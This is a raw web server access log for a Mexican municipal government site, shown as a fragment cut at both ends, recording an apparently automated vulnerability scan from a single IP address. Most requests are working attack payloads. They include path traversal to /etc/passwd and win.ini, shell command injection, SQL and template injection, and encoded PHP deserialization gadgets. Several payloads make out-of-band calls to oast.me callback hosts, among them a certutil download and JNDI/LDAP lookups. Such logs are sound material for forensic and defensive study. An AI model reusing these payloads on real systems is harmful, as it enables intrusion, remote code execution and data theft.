/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:50 -0600] "GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:50 -0600] "GET / HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:54 -0600] "GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:56 -0600] "GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 154.49.207.220 - - [01/Feb/2025:11:53:45 -0600] "GET / HTTP/2.0" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Zoom 3.6.0; rv:11.0) like Gecko" mail.chocholayucatan.gob.mx 192.185.131.128 66.249.92.168 - - [01/Feb/2025:12:23:02 -0600] "GET / HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:30 -0600] "GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:32 -0600] "GET /tshirtecommerce/fonts.php?name=2&type=./../index.php HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:33 -0600] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:39 -0600] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22certutil%20-urlcache%20-split%20-f%20http://cudo29mjalo72u293ingr739rpet88h6j.oast.me%22%29%7D__::.x/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:39 -0600] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:29:49 -0600] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/ilJW.css HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:42:10 -0600] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 
89.185.25.131 - - [01/Feb/2025:12:42:22 -0600] "GET /boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:42:22 -0600] "GET /board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:42:27 -0600] "GET /vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_9) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.4 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 51.8.102.197 - - [01/Feb/2025:12:43:28 -0600] "GET /robots.txt HTTP/2.0" 200 90 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot" www.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:12:52:59 -0600] "GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.4.16" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:19 -0600] "GET /RestAPI/ImportTechnicians HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.23" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:23 -0600] "GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 
chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:24 -0600] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:24 -0600] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:16:30 -0600] "GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:24:39 -0600] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:08 -0600] "GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:09 -0600] "GET /lab.html?vpath=//interact.sh HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:09 -0600] "GET /v1/folder?path=%2F HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" chocholayucatan.gob.mx 
192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:10 -0600] "GET /?search==%00{.cookie|ZLRzG3|value%3dCVE-2014-6287.} HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:10 -0600] "GET /api/moduleInformation HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:13 -0600] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:14 -0600] "GET /api/get_device_details HTTP/1.1" 200 25712 "https://chocholayucatan.gob.mx/assets/base/home.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:13:58:16 -0600] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:05 -0600] "GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:06 -0600] "GET /version.web HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.27" chocholayucatan.gob.mx 192.185.131.128 
89.185.25.131 - - [01/Feb/2025:14:36:06 -0600] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:06 -0600] "GET /admin/airflow/code?root&dag_id=example_passing_params_via_test_command HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:07 -0600] "GET /wlsecurity.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:09 -0600] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cudo29mjalo72u293ingg8imfx7y1emu3.oast.me') HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:09 -0600] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:36:11 -0600] "GET /asd/../../../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:19 -0600] "GET /nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" chocholayucatan.gob.mx 192.185.131.128 
89.185.25.131 - - [01/Feb/2025:14:54:22 -0600] "GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:23 -0600] "GET /nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:24 -0600] "GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:25 -0600] "GET /nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:25 -0600] "GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:14:54:28 -0600] "GET /nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:05:03 -0600] "GET /api/Image/withpath/C:%5CWindows%5Cwin.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:31 -0600] "GET /index.php?download=/etc/passwd HTTP/1.1" 406 226 "-" 
"Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:32 -0600] "GET /SetupWizard.aspx/asWMDOXCHf HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:33 -0600] "DELETE /druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2fcudo29mjalo72u293ing3h7nh1ycugynd.oast.me%2ftea%7d HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:34 -0600] "GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:34 -0600] "GET /oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:14:35 -0600] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:20 -0600] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.20" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:22 -0600] "GET / HTTP/1.1" 200 87208 "-" "Mozilla/5.0 
(Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:23 -0600] "GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:24 -0600] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:24 -0600] "GET /api/snapshots/:key HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:15:48:25 -0600] "GET /client/index.php%3F.php/gsb/users.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:03:42 -0600] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:03:44 -0600] "GET /current_config/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:12:50 -0600] "GET /logfile?d=crossdomain.xml HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:16:55 -0600] "GET /assets/../package.json HTTP/1.1" 200 
25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:23:59 -0600] "GET /prweb/PRAuth/app/default/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.27" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:23:59 -0600] "GET /bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=
HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.2.27" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:01 -0600] "GET /jeecg-boot/sys/user/querySysUser?username=admin HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:02 -0600] "GET /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:02 -0600] "GET /?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:03 -0600] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:04 -0600] "GET /web_cste/cgi-bin/product.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:05 -0600] "GET 
/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:07 -0600] "GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:24:19 -0600] "GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:44:44 -0600] "GET /lang/log/httpd.log HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:44:47 -0600] "GET /index.php?page=/etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:44:51 -0600] "GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:55:47 -0600] "GET /XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) 
Version/17.2.1 Safari/605.1.14" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:55:49 -0600] "GET /login/../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:16:55:54 -0600] "GET /.%00./.%00./etc/passwd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:24:26 -0600] "GET /static/../../../a/../../../../etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.27" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:17:24:29 -0600] "GET /wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=
